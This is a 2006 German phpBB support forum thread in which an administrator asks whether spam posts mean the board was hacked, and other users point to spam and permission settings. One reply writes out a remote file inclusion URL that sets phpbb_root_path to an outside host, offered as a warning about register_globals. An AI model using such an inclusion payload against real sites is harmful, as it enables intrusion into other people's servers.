Forum gehackt?

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
reinsle
Mitglied
Beiträge: 93
Registriert: 26.02.2005 18:21
Wohnort: Pfronten
Kontaktdaten:

Forum gehackt?

Beitrag von reinsle »

Hy,

wir hatten bei uns im Forum die letzten Tage 2 Beiträge, einmal ein Link zu diversen Sexseiten, ein anderes mal eine Linkliste zu Online Pharmacie, mit Medikamenten, die unter das Betäubungsmittelgesetz fallen. Daraufin habe ich eben meinen Server untersucht, und auf der Systemebene im ich mir relativ sicher, das mir hier keiner eingebrochen ist. Auch an den Dateien der Forensoftware und den eigenen Webseiten wurde keine veränderung durchgeführt. PHPbb ist eigenltihc auch auf dem aktuellen Stand, die eingebauten MODS auch.

Weiss da jemand, ob im Moment gerade was los ist?

danke euch
Zuletzt geändert von reinsle am 20.03.2006 09:26, insgesamt 2-mal geändert.
PhilippK
Vorstand
Vorstand
Beiträge: 14662
Registriert: 13.08.2002 14:10
Wohnort: Stuttgart
Kontaktdaten:

Beitrag von PhilippK »

Das sieht mir nach 'einfachem' Spam aus.

Gruß, Philipp
Kein Support per PN!
Der Sozialstaat ist [...] eine zivilisatorische Errungenschaft, auf die wir stolz sein können. Aber der Sozialstaat heutiger Prägung hat sich übernommen. Das ist bitter, aber wahr. (Horst Köhler)
Meine Mods
reinsle
Mitglied
Beiträge: 93
Registriert: 26.02.2005 18:21
Wohnort: Pfronten
Kontaktdaten:

Beitrag von reinsle »

Hy Phillip,

ja, kann sein. Aber in dem Forum, in dem er es postete, konnten nur registrierte Posten, aber der Beitrag war als Gast eingestellt. Das macht mich Nachdenklich.
PhilippK
Vorstand
Vorstand
Beiträge: 14662
Registriert: 13.08.2002 14:10
Wohnort: Stuttgart
Kontaktdaten:

Beitrag von PhilippK »

Hast du mal 'nen Link zum Board?

Gruß, Philipp
Kein Support per PN!
Der Sozialstaat ist [...] eine zivilisatorische Errungenschaft, auf die wir stolz sein können. Aber der Sozialstaat heutiger Prägung hat sich übernommen. Das ist bitter, aber wahr. (Horst Köhler)
Meine Mods
PeterSwiss
Mitglied
Beiträge: 8
Registriert: 04.03.2006 16:53

Beitrag von PeterSwiss »

das folgende sollte eigentlich unnötig sein. Wenn im php.ini
register_globals=On ist, und
allow_url_fopen=On,
dann kann das BB mit dem dümmsten aller einfachen Tricks aufgebrochen werden. Ich sah solche Angriffe (im Log, nicht im BB), und ein Blick in index.php zeigt, dass es sogar noch einfacher geht als im Log:

http : //website.tld/forum?phpbb_root_path=http://ichmachewasichwillextension.inc

Abgesehen davon dass im Fall der Original Frage der Poster sich als "Gast" registrieren kann
reinsle
Mitglied
Beiträge: 93
Registriert: 26.02.2005 18:21
Wohnort: Pfronten
Kontaktdaten:

Beitrag von reinsle »

Hy,

@philip:

http://forum.casablitzblanca.de/phpbb/index.php

@Peter: RegisterGlobals ist natürlich off.
reinsle
Mitglied
Beiträge: 93
Registriert: 26.02.2005 18:21
Wohnort: Pfronten
Kontaktdaten:

Beitrag von reinsle »

Hy,

ich habs. Wenn man(n) die Augen aufmacht, findet man meist die Fehler. In dem entsprechenden Forum war das Posten von allen erlaubt, also auch von Gästen, was sonst im Forum nicht erlaubt ist.

Danke euch für eure Tips.
reinsle
Mitglied
Beiträge: 93
Registriert: 26.02.2005 18:21
Wohnort: Pfronten
Kontaktdaten:

Beitrag von reinsle »

Hy,

jetzt hab ich doch etwas neuere Kentnisse. Die besagte Linksliste der Sexforen sidn ja bei uns aufgetaucht, daraufhin hat eine Adminkollegin geschaut, wie die Foreneinstellungen sind, in bezug auf Posten von nichtregistrierten. Da hat sie es umgestellt auf registrierte. Als ich dann wieder geschaut hab ... wars wieder auf alle.

Gibt es einen Exploit, der die Rechteeinstellungen beeinflussen kann?
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“